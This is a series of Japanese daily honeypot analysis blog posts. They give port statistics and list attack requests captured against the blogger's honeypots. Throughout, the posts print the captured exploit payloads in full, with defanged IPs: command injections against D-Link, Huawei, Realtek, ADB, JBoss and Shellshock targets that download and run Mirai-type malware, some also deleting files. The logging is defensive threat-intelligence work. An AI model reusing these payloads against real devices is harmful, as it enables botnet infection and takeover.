ハニーポット簡易分析(24日目:9/1)
本来であれば、8/30,8/31の分析を行うはずでしたが、こちらの手違いでデータをロストしてしまいましたorz
今回は9/1分の分析となります。
9/1 Honeytrap 3422件(データ部 0byte以上)
ポート | 件数 | 割合 | サービス |
445 | 1,813 | 52.98% | SMB |
22 | 118 | 3.45% | SSH |
3389 | 84 | 2.46% | RDP |
1433 | 77 | 2.25% | Microsoft SQL Server |
502 | 61 | 1.78% | Modbus Protocol |
52869 | 58 | 1.70% | D-Link, Realtek SDK |
8080 | 47 | 1.37% | PROXY |
5986 | 34 | 0.99% | Windows PowerShell Default psSession Port |
81 | 32 | 0.94% |
goahead |
64738 | 32 | 0.94% | Mumble VoIP server |
マルウェアダウンロード関連
宛先ポート | 対象 | パス | ペイロード |
5555 | Android Debug Bridge | CNXN[.][.][.][.][.][.][.][.][.][.][.][.]2[.][.][.]¼±§±host::[.]OPEN[.][.][.][.][.][.][.][.]Ý[.][.][.]&A[.][.]°¯º±shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;[.] →VirusTotal |
|
CNXN[.][.][.][.][.][.][.][.][.][.][.][.]2[.][.][.]¼±§±host::[.]OPEN)[.][.][.][.][.][.][.][.][.][.][.]O/[.][.]°¯º±shell:cd /data/local/tmp/; busybox wget hxxp://27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2[.] →VirusTotal |
|||
8080 | JBOSS | GET /jbossass/jbossass.jsp | GET /jbossass/jbossass[.]jsp?ppp=wget+hxxp%3A%2F%2F49[.]123[.]1[.]37%2Fctbuzs%2Fstdpic%2F2015%2F02%2Fdevice%2Fjboss%2Fplaintext[.]txt HTTP/1[.]1 User-Agent: jexboss →VirusTotal |
D-Link DSL-2750B | GET /login.cgi | wget%20hxxp://148[.]72[.]176[.]78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ User-Agent: Hakai/2[.]0 →VirusTotal |
|
808 | D-Link 社のルータ (CVE-2015-2051) |
POST /HNAP1/ | SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://148[.]72[.]176[.]78/ngynx && sh ngynx` →VirusTotal |
SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://176[.]32[.]33[.]171/kenjiro[.]mips && chmod 777 /tmp/kenjiro[.]mips/ && /tmp/kenjiro[.]mips` →VirusTotal |
|||
SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://77[.]87[.]77[.]250/izuku[.]mips && chmod +x izuku[.]mips; [.]/izuku[.]mips` →VirusTotal |
|||
37215 | Huawei社のルータ | POST /ctrlt/DeviceUpgrade_1 | <NewStatusURL>$(busybox wget -g 142[.]93[.]245[.]252 -l /tmp/aa1 -r /gaybub/miori[.]mips;busybox chmod +x /tmp/aa1 ;/tmp/aa1 huawei)</NewStatusURL> →VirusTotal |
52869 | Realtek SDK miniigd SOAP | POST /picdesc.xml | <NewInternalClient>`cd /var; rm -rf nig; wget hxxp://185[.]10[.]68[.]127/rtbin -O nig; chmod 777 nig; [.]/nig realtek`</NewInternalClient> →VirusTotal |
<NewInternalClient>`cd /var;wget hxxp://80[.]211[.]57[.]80/rr`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /tmp/;wget hxxp://159[.]65[.]232[.]56/xd[.]mips`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /var;wget hxxp://80[.]211[.]57[.]80/miori[.]mips`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /tmp/;wget hxxp://107[.]191[.]99[.]41/elf[.]mips -O elf`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /tmp/;wget hxxp://46[.]101[.]250[.]21/8mips8[.]mips -O 8mips8`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /var; rm -rf nig; wget hxxp://185[.]10[.]68[.]127/rtbin -O nig; chmod 777 nig; [.]/nig realtek`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /tmp/; wget hxxp://76[.]74[.]170[.]223/shit[.]mips -O k`</NewInternalClient> →VirusTotal |
大きな傾向の変化は特にありませんでした。
分析する上で、手動で行なっている部分が非常に多いため、自動化で分析に時間がかけられるようにしたいと思っています。また、IDSのsuricataも導入したものの、うまく使えていないのが現状となっています。
今月は自動化とIDSのチューニングに力を入れて、頑張っていきます。
ハニーポット簡易分析(21,22日目:8/28,8/29)
遅れましたが、Honeypotの簡易分析 8/28,8/29分の更新となります。
8/28
Honeytrap 3,418 件 (データ部 0byte以上)
※80ポートは除く
ポート | 件数 | 割合 | サービス |
445 | 1,954 | 57.17% | SMB |
3389 | 69 | 2.02% | RDP |
1433 | 62 | 1.81% | Microsoft SQL Server |
3128 | 52 | 1.52% | ? |
8080 | 46 | 1.35% | PROXY |
52869 | 45 | 1.32% | D-Link, Realtek SDK |
81 | 37 | 1.08% | ? |
8443 | 35 | 1.02% | ? |
5555 | 32 | 0.94% | Android Debug Bridge |
4500 | 32 | 0.94% | IPSec NAT Traversal |
8/29
Honeytrap 3,600 件 (データ部 0byte以上)
※80ポートは除く
ポート | 件数 | 割合 | サービス |
445 | 2,057 | 57.14% | SMB |
3389 | 151 | 4.19% | RDP |
8080 | 70 | 1.94% | PROXY |
1433 | 68 | 1.89% | Microsoft SQL Server |
9600 | 62 | 1.72% | ? |
52869 | 46 | 1.28% | D-Link, Realtek SDK |
5555 | 37 | 1.03% | Android Debug Bridge |
1471 | 32 | 0.89% | ? |
81 | 24 | 0.67% | ? |
22 | 22 | 0.61% | SSH |
<マルウェアダウンロード>
宛先ポート | リクエスト | ダウンロード | 脆弱性 |
5555 | wget hxxp://207[.]148[.]78[.]152/br VirusTotal |
Android Debug Bridge に対する攻撃 | |
wget hxxp://185[.]162[.]130[.]187/adbs VirusTotal |
|||
wget hxxp://27[.]102[.]115[.]44/adbs VirusTotal |
|||
8081 | POST /HNAP1/ | wget hxxp://148[.]72[.]176[.]78/ngynx VirusTotal |
D-Link 社のルータへの攻撃(CVE-2015-2051) |
wget hxxp://176[.]32[.]33[.]171/kenjiro[.]mip VirusTotal |
|||
wget hxxp://148[.]72[.]176[.]78/ken[.]sh | |||
37215 | POST /ctrlt/DeviceUpgrade_1 | wget -g 209[.]141[.]33[.]86 VirusTotal |
Huawei社のルータを狙った攻撃 |
wget -g 31[.]220[.]43[.]190 | |||
52869 | POST /picdesc[.]xml | wget hxxp://185[.]10[.]68[.]127/rtbin | Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃 |
wget hxxp://80[.]211[.]112[.]150/mips | |||
wget hxxp://80[.]211[.]137[.]127/ntpd | |||
wget hxxp://159[.]65[.]232[.]56/xd[.]mips | |||
wget hxxp://80[.]211[.]55[.]29/SSG/mips[.]SSG | |||
wget hxxp://107[.]191[.]99[.]41/elf[.]mips | |||
wget hxxp://167[.]99[.]228[.]78/8mips8[.]mips | |||
wget hxxp://167[.]99[.]228[.]78/8mips8[.]mip | |||
wget hxxp://185[.]10[.]68[.]127/rtbin VirusTotal |
他のハニーポッターの話を聞いてみると、やはりMirai関連のマルウェアが多くを占めています。まだまだ、継続して検知しそうです。
以上、簡易分析でした。
ハニーポット簡易分析(20日目:8/27)
8/27の分析となります。 先日、IDSである Suricataを導入しましたので、そちらの結果も記載しています(まだまだ、チューニングが必要ですが。。。)
8/27 Honeytrap分析結果
※なお、80ポートの通信は含まれていません。
検知数:7802件(データ部 0byte以上 3606件)
ポート | 件数 | 割合 | サービス | 補足 |
445 | 1,992 | 47.95% | SMB | |
220 | 292 | 7.03% | IMAP3 |
コマンド:SSH-2.0-libssh2_1.4.3 |
1433 | 68 | 1.64% | Microsoft SQL Server | |
3389 | 57 | 1.37% | RDP | |
52869 | 51 | 1.23% | D-Link, Realtek SDK | マルウェアダウンロード |
22 | 48 | 1.16% | SSH | |
35928 | 42 | 1.01% | ? | マルウェアダウンロード |
81 | 41 | 0.99% | ? | |
3390 | 39 | 0.94% | ? | |
8080 | 36 | 0.87% | PROXY |
IDSの検知
※全ポートの通信を含んでいます。
シグネチャ名 | 検知数 | 割合 |
POLICY Cleartext WordPress Login | 6,301 | 99.31% |
HTTP missing Host header | 43 | 0.68% |
SMTP no server welcome message | 1 | 0.02% |
宛先ポート:8081
①D-Link 社のルータへの攻撃CVE-2015-2051)
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://148.72.176[.]78/ngynx && sh ngynx`
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://176.32.32[.]156/bin && sh /tmp/bin`
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://176.32.33[.]171/kenjiro.mips && chmod 777 /tmp/kenjiro.mips/ && /tmp/kenjiro.mips`
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp; >DIR & cd /var; >DIR; rm -rf *; wget hxxp://148.72.176[.]78/ken.sh; sh ken.sh`
宛先ポート:37215
①Huawei社のルータを狙った攻撃
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
・$(busybox wget -g 168.235.82[.]217 -l /tmp/xDvAq -r mpswof ;chmod +x /tmp/xDvAq ;/tmp/xDvAq h)
宛先ポート:52869
①Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃
→mirai関連のマルウェア
POST /picsdesc.xml HTTP/1.1
・cd /tmp/;wget hxxp://80.211.47[.]28/jackmymips
・cd /tmp/;wget hxxp://159.65.232[.]56/xd.mips
・cd /tmp/;wget hxxp://107.191.99[.]41/elf.mips -O elf
・cd /tmp/;wget hxxp://142.93.1[.]75/hoho.mips -O hoho
・cd /tmp/;wget hxxp://167.99.228[.]78/ntpd.mips -O ntpd
・cd /tmp/;wget hxxp://167.99.228[.]78/8mips8.mips -O 8mips8
・cd /tmp/;wget hxxp://128.199.45[.]173/sora.mips -O sora.mips
宛先ポート:5555
①Android Debug Bridge に対する攻撃
CNXN............2...¼±§±host::.OPEN........Ý...&A..°¯º±shell:cd /data/local/tmp;wget hxxp://207.148.78.[.]52/br -O- >br;sh br;busybox wget hxxp://207.148.78[.]152/r -O- >r;sh r;curl hxxp://207.148.78.152/c >c;sh c;busybox curl hxxp://207.148.78[.]152/bc >bc;sh bc;rm -rf bc br r c;.
CNXN............2...¼±§±host::.OPEN)...........O/..°¯º±shell:cd /data/local/tmp/; busybox wget hxxp://27.102.115.[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27.102.115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2.
特段、傾向的に大きく変わったものはありませんでした。
IDSはデフォルトのまま導入していることもあり、チューニングしないと有効な分析は出来なさそうでした。現状は、Wordpressのログイン試行を大量に検知したことぐらいが分かるものでした。チューニングは9月ごろから本格的に実施出来ればと思っています。
以上、今回の簡易分析結果でした。
ハニーポット簡易分析(19日目:8/26)
8/26からHoneytrapのログが復活したので、Honeytrapの分析を行いたいと思います。
8/26 Honeytrap分析結果
検知数 6335件(データ部 0byte以上 3622件)
ポート | 件数 | 割合 | サービス | 補足 |
445 | 1,781 | 49.16% | SMB | |
1433 | 70 | 1.93% | Microsoft SQL Server | |
3389 | 65 | 1.79% | RDP | |
52869 | 53 | 1.46% | D-Link, Realtek SDK | マルウェアダウンロード |
8888 | 51 | 1.41% | ? | |
81 | 49 | 1.35% | ? | |
8080 | 47 | 1.30% | PROXY | |
992 | 34 | 0.94% | TELNET protocol over TLS/SSL | |
500 | 33 | 0.91% | ipsec | |
19 | 32 | 0.88% | chargen |
宛先ポート:8081
①D-Link 社のルータへの攻撃CVE-2015-2051)
POST /HNAP1/ HTTP/1.0
・wget hxxp://148[.]72[.]176[.]78/ngynx
・wget hxxp://176[.]32[.]32[.]156/bin
宛先ポート:37215
①Huawei社のルータを狙った攻撃
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
・wget -g 31[.]220[.]43[.]190
宛先ポート:52869
①Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃
→ Mirai系マルウェア
POST /picdesc.xml HTTP/1.1
・wget hxxp://80[.]211[.]67[.]245/mips
・wget hxxp://159[.]65[.]232[.]56/xd.mips
・wget hxxp://107.191.99.41/elf.mips
・wget hxxp://167.99.228.78/ntpd.mips
・wget hxxp://128.199.45.173/sora.mips
宛先ポート:5555
①Android Debug Bridge に対する攻撃
CNXN............2...¼±§±host::.OPEN........Ý...&A..°¯º±shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;.
CNXN............2...¼±§±host::.OPEN)...........O/..°¯º±shell:cd /data/local/tmp/; busybox wget hxxp://27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2.
今回の分析は以上となります。最近、Suricataも導入したため、その結果も近日中に報告できればと思ってます(ただし、デフォルト設定で入れたため、有効な検知が少ないですが。。。)。
ハニーポット簡易分析(18日目:8/25)
Honeytrapのログがうまく取得出来ていなかった関係で WoWHoneypotの簡易分析となります。今回もApache Struts2 の脆弱性(CVE-2018-11776)(S2-057)は来ていませんでした。。。。8/25分のWoWHoneypotの簡易分析となります。
WoWHoneypotの分析(8/25)
検知数:180件
<検知パス一覧>
URL パス | 概要 | マルウェア ダウンロード |
/ | インデックスファイルへのアクセス | × |
/12.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/56.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/9678.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/PMA/index.php | 調査行為(DB関連) | × |
/PMA2/index.php | 調査行為(DB関連) | × |
/_query.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/admin/PMA/index.php | 調査行為(DB関連) | × |
/admin/index.php | 調査行為(DB関連) | × |
/admin/mysql/index.php | 調査行為(DB関連) | × |
/admin/mysql2/index.php | 調査行為(DB関連) | × |
/admin/phpMyAdmin/index.php | 調査行為(DB関連) | × |
/admin/phpmyadmin2/index.php | 調査行為(DB関連) | × |
/admin/zkyzp.jsp | PW・ID 共にadminでのアクセス | × |
/ak.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/ak47.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/angge.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/aotu.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/aw.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/cainiao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/claroline/phpMyAdmin/index.php | 調査行為(DB関連) | × |
/cmd.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/cmdd.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/cmv.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/cmx.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/conflg.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/data.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/db.init.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/db__.init.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/db_cts.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/db_pma.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/db_session.init.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/dbadmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/defect.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/desktop.ini.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/fack.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/favicon.ico | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/feixiang.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/fileserver/sex../../..%5Cadmin/zkyzp.jsp | PUTコマンドの試行 | × |
/help.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/hh.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/hm.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/index.php | indexファイルへのアクセス | × |
/infoo.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/ip.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/java.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/l7.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/l8.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/lala-dpr.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/lindex.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/log.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://176[.]32[.]32[.]156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ | D-Linkの脆弱性を狙った攻撃 | ○ |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://199[.]195[.]254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$ | D-Linkの脆弱性を狙った攻撃 | ○ |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ | D-Linkの脆弱性を狙った攻撃 | ○ |
/lol.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/manager/html | Tomcat管理マネージャーへのアクセス | × |
/min.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/muhstik-dpr.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/muhstik.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/muhstik2.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/muhstiks.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/mx.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/myadmin/index.php | 調査行為(DB関連) | × |
/myadmin2/index.php | 調査行為(DB関連) | × |
/mysql-admin/index.php | 調査行為(DB関連) | × |
/mysql/index.php | 調査行為(DB関連) | × |
/mysqladmin/index.php | 調査行為(DB関連) | × |
/mz.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/pe.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/phpMyAdmin.old/index.php | 調査行為(DB関連) | × |
/phpMyAdmin/index.php | 調査行為(DB関連) | × |
/phpMyAdmin/phpMyAdmin/index.php | 調査行為(DB関連) | × |
/phpMyAdminold/index.php | 調査行為(DB関連) | × |
/phpMyadmin_bak/index.php | 調査行為(DB関連) | × |
/phpadmin/index.php | 調査行為(DB関連) | × |
/phpma/index.php | 調査行為(DB関連) | × |
/phpmyadmin-old/index.php | 調査行為(DB関連) | × |
/phpmyadmin0/index.php | 調査行為(DB関連) | × |
/phpmyadmin1/index.php | 調査行為(DB関連) | × |
/phpmyadmin2/index.php | 調査行為(DB関連) | × |
/phpstudy.php | 調査行為(DB関連) | × |
/pma-old/index.php | 調査行為(DB関連) | × |
/pmamy/index.php | 調査行為(DB関連) | × |
/pmamy2/index.php | 調査行為(DB関連) | × |
/pmd/index.php | 調査行為(DB関連) | × |
/q.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/qaq.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/qq.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/s.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/sheep.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/ssaa.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/system.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/test.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/text.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/tools/phpMyAdmin/index.php | 調査行為(DB関連) | × |
/typo3/phpmyadmin/index.php | 調査行為(DB関連) | × |
/uploader.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/w.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wanan.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wc.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/web/phpMyAdmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/webdav/ | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/webslee.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/weixiao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wp-config.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wpo.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wshell.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wuwu11.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/www/phpMyAdmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/x.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xampp/phpmyadmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xiao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xiaoma.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xshell.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xw.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xw1.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xx.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/yao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/yumo.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/z.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/zuoshou.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
<マルウェアダウンロード>
D-Linkの脆弱性を狙った攻撃を検知していますが、おそらくMirai系だと思います。時間があるときにここらのマルウェアは分析したいですね。
・wget hxxp://176[.]32[.]32[.]156/bin
→VirusTotal
・wget hxxp://199[.]195[.]254[.]118/dlink
・wget hxxp://209[.]141[.]33[.]86/d
→VirusTotal
以上、簡易分析となります。
ハニーポット簡易分析(17日目:8/24)
本来であれば、Honeytrapの分析を行う予定でしたが、なぜかログが取得出来ていなかったため、今回はWoWHoneypotの分析を行いました。
8/24 WoWHoneypot検知数 49件
接続先 | 概要 | 攻撃 |
/ | indexファイルへのアクセス | × |
/index.php | indexファイルへのアクセス | × |
/ipc$ | 調査行為 | × |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://176[.]32[.]32[.]156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ | D-Linkの脆弱性を狙った攻撃 ※Hakai/2.0 |
○ |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ | D-Linkの脆弱性を狙った攻撃 ※Shinka/1.0 |
○ |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://212[.]237[.]32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ | D-Linkの脆弱性を狙った攻撃 ※LMAO/2.0 |
○ |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://50[.]115[.]166[.]136/hakai.mips%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ | D-Linkの脆弱性を狙った攻撃 ※Hakai/2.0 |
○ |
マルウェアの分析は以下となります。
ダウンロード可能
・wget hxxp://176[.]32[.]32[.]156/bin →https://www.virustotal.com/#/file/fa588bdc625f5103d4960f5905a9b314a78de8dd35eccdf3e62ca52963148ee3/detection
ダウンロード不可
・wget hxxp://209[.]141[.]33[.]86/d
・wget hxxp://212[.]237[.]32[.]62/k
・wget hxxp://50.115.166.136/hakai.mips
今回は、Hakai 2.0 がダウンロード可能でした。Honeytrapと比較すると検知数は少ないですが、検知している通信が違うので、分析していて面白いですね。また、明日もHoneytrapのログは取れていないため、WoWHoneypotを分析する予定です。
以上、簡易分析となります。
ハニーポット簡易分析(16日目:8/23)
Apache Struts2 の脆弱性(CVE-2018-11776)(S2-057)が話題になっていますが、 23日時点ではまだ攻撃は観測できていませんでした。
早く観測できないかなーと思いつつ、8月23日分の分析を行います。
8/23 Honeytrap 分析
検知数 5583件 (データ有 3043件)
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,627 | 53.47% | 調査行為 |
22 | SSH | 90 | 2.96% | 調査行為 |
1433 | Microsoft SQL Server | 67 | 2.20% | 調査行為 |
3389 | RDP | 54 | 1.77% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 41 | 1.35% | /conf へのアクセス |
52869 | D-Link, Realtek SDK | 40 | 1.31% | マルウェアダウンロード |
81 | ? | 40 | 1.31% | 調査行為 |
993 | IMAPS | 38 | 1.25% | 調査行為 |
8000 | ? | 36 | 1.18% | 調査行為 |
2375 | Docker | 34 | 1.12% | 調査行為 |
マルウェアダウンロード:
ポート:8081
①D-Link 社のルータへの攻撃CVE-2015-2051)
→
POST /HNAP1/ HTTP/1[.]0
SOAPAction: hxxp;//purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp;//176[.]32[.]32[.]156/bin && sh /tmp/bin`
ポート:37215
①Huawei社のルータを狙った攻撃
POST /ctrlt/DeviceUpgrade_1 HTTP/1[.]1
wget -g 209[.]141[.]33[.]86
ポート:52869
①Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃
→ Mirai系マルウェア
POST /picsdesc[.]xml HTTP/1[.]1
・wget hxxp;//212[.]237[.]32[.]62/mips
・wget hxxp;//159[.]65[.]232[.]56/xd[.]mips
・wget hxxp;//167[.]99[.]14[.]199/bogan[.]mips
・wget hxxp;//107[.]191[.]99[.]41/elf[.]mips
・wget hxxp;//142[.]93[.]1[.]75/hoho[.]mips
ポート:8080
① Shell Shock の脆弱性を狙った攻撃
GET /cgi-bin/authLogin[.]cgi HTTP/1[.]1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0[.]sh && /bin/mkdir -p /share/HDB_DATA/[.][.][.]/php && /usr/bin/wget -c hxxp;//185[.]14[.]30[.]79/S0[.]sh -P /tmp && /bin/sh /tmp/S0[.]sh 0<&1 2>&1
②D-Linkのルータの脆弱性を狙った攻撃
GET /login[.]cgi?cli=aa%20aa%27;wget%20hxxp;//209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/[.]shinka;sh%20/tmp/[.]shinka%27$ HTTP/1[.]1
ポート 5555
①Android Debug Bridge に対する攻撃
CNXN ¼±§±host:: OPEN Ý °¯º±shell:cd /data/local/tmp;wget hxxp;//207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp;//207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp;//207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp;//207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;[.]
CNXN ¼±§±host:: OPEN Ý °¯º°¯º±shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp;//185[.]162[.]130[.]187/adbs -O -> adbs; sh adbs; curl hxxp;//185[.]162[.]130[.]187/adbs2 > adbs2; sh adbs2; rm adbs adbs2[.]
CNXN ¼±§±host:: OPEN Ý °¯º°¯º±shell:cd /data/local/tmp/; busybox wget hxxp;//27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp;//27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2[.]
今回の分析は以上となります。